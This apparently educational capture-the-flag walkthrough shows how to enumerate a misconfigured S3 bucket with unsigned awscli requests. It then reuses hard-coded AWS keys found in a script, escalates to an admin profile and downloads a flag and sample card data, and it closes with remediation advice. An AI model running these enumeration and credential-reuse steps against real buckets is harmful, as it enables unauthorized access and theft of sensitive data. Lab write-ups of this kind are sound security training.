Links

S3 Enumeration Basics

A walkthrough demonstrating how to enumerate S3, exploit a misconfiguration, and escalate privileges to obtain sensitive data.
CTF Source: Pwned Labs

Overview

In this walkthrough, we're provided with a website link. After discovering the site is hosted on AWS S3, we'll learn how to enumerate S3 and, due to a misconfiguration, uncover additional credentials leading to the compromise of several secrets and credit card data.

Pre-Requisites

  • Install awscli: (brew/apt) install awscli

Walkthrough

Finding and Accessing the S3 Bucket

We'll start by visiting the website in our browser and inspecting its source code.
We'll discover the website is retrieving content from S3.
If we attempt to navigate to the CSS file, we'll discover we can see it.
Let's try to traverse the directories of this bucket to see if we can access other files.
Let's try using the awscli like so.
aws s3 ls s3://dev.huge-logistics.com --no-sign-request
PRE admin/
PRE migration-files/
PRE shared/
PRE static/
2023-10-16 11:00:47 5347 index.html
  • --no-sign-request is needed so we’re not signing the request with any local AWS credentials
Okay, now we're noticing some files!
It doesn't appear we can list contents for anything but shared/
aws s3 ls s3://dev.huge-logistics.com/shared/ --no-sign-request
2023-10-16 09:08:33 0
2023-10-16 09:09:01 993 hl_migration_project.zip
Let's attempt to download this file.
aws s3 cp s3://dev.huge-logistics.com/shared/hl_migration_project.zip --no-sign-request .
download: s3://dev.huge-logistics.com/shared/hl_migration_project.zip to ./hl_migration_project.zip
Nice! Let's open it up and see what we can find.

Finding Credentials

Unzipping the file
unzip ./hl_migration_project.zip
Reading the contents
cat migrate_secrets.ps1
# AWS Configuration
$accessKey = "AKIA3[snip]"
$secretKey = "MwGe3[snip]"
$region = "us-east-1"
[snip]
We found some creds!

Gaining Access to migration-files

We can use the command aws configure and set up the credentials we just found.
Let's try to enumerate those admin files we found previously.
aws s3 ls s3://dev.huge-logistics.com/admin/
2023-10-16 09:08:38 0
2023-10-16 09:10:51 32 flag.txt
2023-10-16 14:24:07 2425 website_transactions_export.csv
Okay, we're getting somewhere. Can we download the data?
aws s3 cp s3://dev.huge-logistics.com/admin/flag.txt .
fatal error: An error occurred (403) when calling the HeadObject operation: Forbidden
Nope... Let's move on to those migration-files and try that.
aws s3 ls s3://dev.huge-logistics.com/migration-files/
2023-10-16 09:08:47 0
2023-10-16 09:09:26 1833646 AWS Secrets Manager Migration - Discovery & Design.pdf
2023-10-16 09:09:25 1407180 AWS Secrets Manager Migration - Implementation.pdf
2023-10-16 09:09:27 1853 migrate_secrets.ps1
2023-10-16 12:00:13 2494 test-export.xml
aws s3 cp s3://dev.huge-logistics.com/migration-files/test-export.xml .
download: s3://dev.huge-logistics.com/migration-files/test-export.xml to ./test-export.xml
Nice! Let's read the files.
cat test-export.xml
<?xml version="1.0" encoding="UTF-8"?>
<CredentialsExport>
<!-- Oracle Database Credentials -->
[SNIP]
</CredentialEntry>
<!-- AWS Production Credentials -->
<CredentialEntry>
<ServiceType>AWS IT Admin</ServiceType>
Looks like we found several credentials for various systems! Let's test out the AWS IT Admin creds.

Gaining Access to admin

Again, we'll set up our credentials like so,
aws configure --profile it-admin
Let's try to download those admin files now.
aws --profile it-admin s3 cp s3://dev.huge-logistics.com/admin/flag.txt .
download: s3://dev.huge-logistics.com/admin/flag.txt to ./flag.txt
cat ./flag.txt
a49f1[snip]
Success! We found the flag! Likewise, if we download the other file, website_transactions_export.csv we'll uncover some plaintext credit card information!
cat website_transactions_export.csv
network,credit_card_number,cvv,expiry_date,card_holder_name,validation,username,password,ip_address
Visa,4055497191304,386,5/2021,Hunter Miller,,hunter_m,password123,34.56.78.90
Visa,4055491339081,492,8/2021,Jayden Adams,,jay_adams,jayden2023,157.89.34.56
[SNIP]

Wrap-up

In this scenario, unauthorized access was obtained to a shared folder within the S3 bucket without authentication. Subsequently, a zip file was downloaded from this folder, revealing a script embedded with hard-coded AWS credentials. These credentials were leveraged to access the /migration-files/ folder, where a file containing additional hard-coded credentials, including those for the AWS IT Admin user, was retrieved. Utilizing the IT Admin credentials, we successfully obtained the flag and plaintext credit card data from the /admin/ directory of the S3 bucket.
Let's discuss a few issues we uncovered along the way,
  1. 1.
    Multi-use of an S3 bucket
    • It's clear that this bucket was used for multiple purposes (website hosting, credit card data storage, and some sort of secrets management migration)
    • Multi-use of a bucket like this can lead to unintentional consequences as we uncovered
    • Recommendation:
      • Separate buckets should be utilized for different use cases to reduce the likelihood of permission misconfiguration
  2. 2.
    Mishandling of credit card data
    • The credit card data found was unencrypted and not stored in an appropriate location
    • Recommendation:
      • Encrypt credit card data
      • Store this data in an appropriate location and restrict access
  3. 3.
    World-readable shared directory
    • This directory was accessible by anyone and contained hard-coded secrets to several solutions.
    • The exposed secrets enabled privilege escalation, ultimately leading to the exfiltration of credit card data.
    • Recommendation:
      • Store this data in an appropriate location and restrict access
      • If the data needs to be shared externally, consider enabling cross-account access via an IAM Role or sharing in an alternative secure solution.